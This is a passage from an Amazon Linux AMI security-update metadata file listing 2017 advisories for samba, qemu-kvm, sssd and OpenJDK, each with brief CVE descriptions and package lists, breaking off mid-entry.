arch="i686"><filename>Packages/exim-debuginfo-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.89-4.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-933</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-933: important priority package update for samba</title><issued date="2017-12-20 18:53:00" /><updated date="2017-12-21 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15275:
A memory disclosure flaw was found in samba. An attacker could retrieve parts of server memory, which could contain potentially sensitive data, by sending specially-crafted requests to the samba server.
1512465:
CVE-2017-15275 samba: Server heap-memory disclosure
CVE-2017-14746:
A use-after-free flaw was found in the way samba servers handled certain SMB1 requests. An unauthenticated attacker could send specially-crafted SMB1 requests to cause the server to crash or execute arbitrary code.
1511899:
CVE-2017-14746 samba: Use-after-free in processing SMB1 requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14746" title="" id="CVE-2017-14746" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15275" title="" id="CVE-2017-15275" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.6.2" release="12.37.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.6.2-12.37.amzn1.noarch.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.6.2" release="12.37.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.6.2-12.37.amzn1.noarch.rpm</filename></package><package name="ctdb-tests" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.6.2-12.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-934</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-934: medium priority package update for qemu-kvm</title><issued date="2017-12-20 18:55:00" /><updated date="2017-12-21 22:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15289:
Quick emulator (QEMU), compiled with the Cirrus CLGD 54xx VGA Emulator support, is vulnerable to an OOB write access issue. The issue could occur while writing to VGA memory via mode4and5 write functions. A privileged user inside guest could use this flaw to crash the QEMU process resulting in Denial of Serivce (DoS).
1501290:
CVE-2017-15289 Qemu: cirrus: OOB access issue in mode4and5 write functions
CVE-2017-14167:
Quick Emulator (QEMU), compiled with the PC System Emulator with multiboot feature support, is vulnerable to an OOB r/w memory access issue. The issue could occur due to an integer overflow while loading a kernel image during a guest boot. A user or process could use this flaw to potentially achieve arbitrary code execution on a host.
1489375:
CVE-2017-14167 Qemu: i386: multiboot OOB access while loading kernel image
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14167" title="" id="CVE-2017-14167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15289" title="" id="CVE-2017-15289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-common" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-141.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-935</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-935: medium priority package update for sssd</title><issued date="2017-12-20 18:56:00" /><updated date="2017-12-21 22:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12173:
It was found that sssd&#039;s sysdb_search_user_by_upn_res() function did not sanitize requests when querying its local cache and was vulnerable to injection. In a centralized login environment, if a password hash was locally cached for a given user, an authenticated attacker could use this flaw to retrieve it.
1498173:
CVE-2017-12173 sssd: unsanitized input when searching in local cache database
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12173" title="" id="CVE-2017-12173" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sssd-krb5" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.15.2" release="50.34.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.15.2-50.34.amzn1.noarch.rpm</filename></package><package name="libsss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-936</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-936: critical priority package update for java-1.7.0-openjdk</title><issued date="2017-12-20 19:02:00" /><updated date="2017-12-21 23:08:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10388:
It was discovered that the Kerberos client implementation in the Libraries component of OpenJDK used the sname field from the plain text part rather than encrypted part of the KDC reply message. A man-in-the-middle attacker could possibly use this flaw to impersonate Kerberos services to Java applications acting as Kerberos clients.
1502038:
CVE-2017-10388 OpenJDK: use of unprotected sname in Kerberos client (Libraries, 8178794)
CVE-2017-10357:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502614:
CVE-2017-10357 OpenJDK: unbounded memory allocation in ObjectInputStream deserialization (Serialization, 8181597)
CVE-2017-10356:
It was discovered that the Security component of OpenJDK generated weak password-based encryption keys used to protect private keys stored in key stores. This made it easier to perform password guessing attacks to decrypt stored keys if an attacker could gain access to a key store.
1503169:
CVE-2017-10356 OpenJDK: weak protection of key stores against brute forcing (Security, 8181692)
CVE-2017-10355:
It was found that the FtpClient implementation in the Networking component of OpenJDK did not set connect and read timeouts by default. A malicious FTP server or a man-in-the-middle attacker could use this flaw to block execution of a Java application connecting to an FTP server.
1502869:
CVE-2017-10355 OpenJDK: no default network operations timeouts in FtpClient (Networking, 8181612)
CVE-2017-10350:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAX-WS). Supported versions that are affected are Java SE: 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502640:
CVE-2017-10350 OpenJDK: unbounded memory allocation in JAXWSExceptionBase deserialization (JAX-WS, 8181100)
CVE-2017-10349:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502611:
CVE-2017-10349 OpenJDK: unbounded memory allocation in PredicatedNodeTest deserialization (JAXP, 8181327)
CVE-2017-10348:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502629:
CVE-2017-10348 OpenJDK: multiple unbounded memory allocations in deserialization (Libraries, 8181432)
CVE-2017-10347:
